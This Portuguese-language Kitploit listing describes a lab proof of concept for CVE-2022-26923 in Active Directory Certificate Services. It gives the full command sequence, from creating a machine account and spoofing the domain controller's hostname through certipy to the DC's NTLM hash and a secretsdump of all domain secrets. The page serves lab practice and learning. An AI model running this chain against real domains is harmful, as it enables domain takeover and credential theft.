Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/gh-badr/cve-2022-26923
Escalada de PrivilégiosExploraçãoTestes de PenetraçãoAprendizado e EducaçãoLabs e Prática
GitHubgh-badr/cve-2022-26923

CVE-2022-26923

Uma prova de conceito que explora a CVE-2022-26923.

Ver Repositório
221há 2 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2022-26923

Descrição

Esta vulnerabilidade permitia que um usuário de baixo privilégio escalasse privilégios para administrador de domínio em um ambiente Active Directory padrão com a função de servidor dos Serviços de Certificados do Active Directory (AD CS) instalada.

Ela está relacionada principalmente à função de Serviços de Certificados do Active Directory (AD CS). A função AD CS é uma função do Windows Server que permite construir uma infraestrutura de chave pública (PKI) e fornecer criptografia de chave pública, certificados digitais e recursos de assinatura digital para sua organização. A função AD CS é usada para emitir certificados para usuários, computadores e serviços.

Índice

  • CVE-2022-26923
    • Descrição
    • Índice
    • Pré-requisitos
    • Ambiente
    • Exploração
    • Prova de Conceito
    • Referências

Pré-requisitos

  • Vagrant
  • VirtualBox

Ambiente

A versão do Windows Server usada é Windows Server 2019 Standard Evaluation, que é a versão vulnerável. O Vagrantfile fornecido (na pasta Vulnerable Machine) criará uma VM do Windows Server 2019 com a função AD CS instalada e configurada, juntamente com um usuário de baixo privilégio com as seguintes credenciais:

  • Usuário: user
  • Senha: V@grant1

Para criar o ambiente, siga estas etapas:

  • Primeiro, clone o repositório e vá para o diretório CVE-2022-26923:
    root@kitploit:~
    git clone https://github.com/Gh-Badr/CVE-2022-26923
    cd CVE-2022-26923
    
  • Se você precisar alterar o endereço IP padrão, pode fazê-lo no Vagrantfile substituindo o endereço IP na seguinte linha:
    root@kitploit:~
    config.vm.network "private_network", type: "static", ip: "192.168.33.13"
    
  • Em seguida, execute o seguinte comando para criar a VM:
    root@kitploit:~
    cd 'Vulnerable Machine'
    vagrant up
    
  • Se você não tiver uma máquina linux com certipy instalado, pode usar a máquina vagrant fornecida no diretório Attacker Machine executando o seguinte comando:
    root@kitploit:~
    cd 'Attacker Machine'
    vagrant up
    

A pasta Attacker Machine contém uma máquina vagrant junto com um script shell que instalará a versão mais recente do certipy. Você também pode usar o script para instalar o certipy na sua máquina linux.

Exploração

Para se conectar à máquina atacante, execute o seguinte comando a partir do diretório Attacker Machine:

root@kitploit:~
vagrant ssh

Agora que você está na máquina atacante, precisa adicionar o endereço IP do Windows Server ao arquivo hosts:

root@kitploit:~
echo "192.168.33.13   VAGRANT-K51B6U3.vagrant.local VAGRANT-K51B6U3 vagrant-VAGRANT-K51B6U3-CA vagrant.local" | sudo tee -a /etc/hosts

Nota: Se você alterou o endereço IP no Vagrantfile da máquina vulnerável, você precisa alterá-lo aqui também.

Em seguida, vamos criar uma nova conta de computador no domínio:

root@kitploit:~
addcomputer.py 'vagrant.local/user:V@grant1' -method LDAPS -computer-name 'CVEPC' -computer-pass 'P@ssw0rd'

Para verificar se a conta de computador foi criada, conecte-se à máquina vulnerável com o usuário user e a senha V@grant1, executando o seguinte comando a partir do diretório Vulnerable Machine:

root@kitploit:~
vagrant ssh

Em seguida, execute o seguinte comando para verificar se a conta de computador foi criada:

root@kitploit:~
Get-ADComputer CVEPC -Properties dnsHostName,servicePrincipalName

Esta conta de máquina tem o dnsHostName CVEPC.vagrant.local. O que queremos é alterar esse dnsHostName para VAGRANT-K51B6U3.vagrant.local, que é o controlador de domínio.

Para isso, primeiro precisamos excluir o Nome Principal do Serviço (SPN) da conta de computador CVEPC executando o seguinte comando:

root@kitploit:~
Set-ADComputer CVEPC -Properties ServicePrincipalName @{}

Em seguida, podemos alterar o dnsHostName para VAGRANT-K51B6U3.vagrant.local executando o seguinte comando:

root@kitploit:~
Set-ADComputer CVEPC -Properties dnsHostName VAGRANT-K51B6U3.vagrant.local
  • Nota: Para entender por que tivemos que excluir o SPN da conta de computador, você pode consultar o projeto Relatório (em francês). Ou você pode verificar o primeiro artigo na seção de referências, que contém uma explicação detalhada do autor da CVE.

Agora que temos uma conta de computador com o dnsHostName VAGRANT-K51B6U3.vagrant.local, podemos solicitar um certificado malicioso da máquina vulnerável executando o seguinte comando na máquina atacante:

root@kitploit:~
certipy req -username '[email protected]' -password 'P@sww0rd' -ca vagrant-VAGRANT-K51B6U3-CA -template Machine -target VAGRANT-K51B6U3.vagrant.local

Você deve obter um certificado chamado vagrant-k51b6u3.pfx no diretório atual. Para verificar se o certificado é válido, use a ferramenta auth do certipy executando o seguinte comando:

root@kitploit:~
certipy auth -pfx vagrant-k51b6u3.pfx

Se o certificado for válido, você deve obter o hash NTLM do controlador de domínio. O que pode ser usado de muitas maneiras maliciosas.

Prova de Conceito

Como prova de conceito, podemos usar o hash NTLM para recuperar todos os segredos armazenados no domínio (como explicado no artigo do autor da CVE). Para isso, podemos usar a ferramenta secretsdump.py da suíte impacket (que é instalada com a versão mais recente do certipy).

Para usar a ferramenta, execute o seguinte comando:

root@kitploit:~
secretsdump.py 'vagrant.local/[email protected]' -hashes :<NTLM hash>

Substitua <NTLM hash> pelo hash NTLM que você obteve na etapa anterior.

Como resultado, você deve obter todos os segredos armazenados no domínio.

Referências

  • Certifried: Active Directory Domain Privilege Escalation (CVE-2022-26923)
  • GitHub - LudovicPatho/CVE-2022-26923_AD-Certificate-Services
  • Try Hack Me - CVE-2022-26923
Baixar ferramenta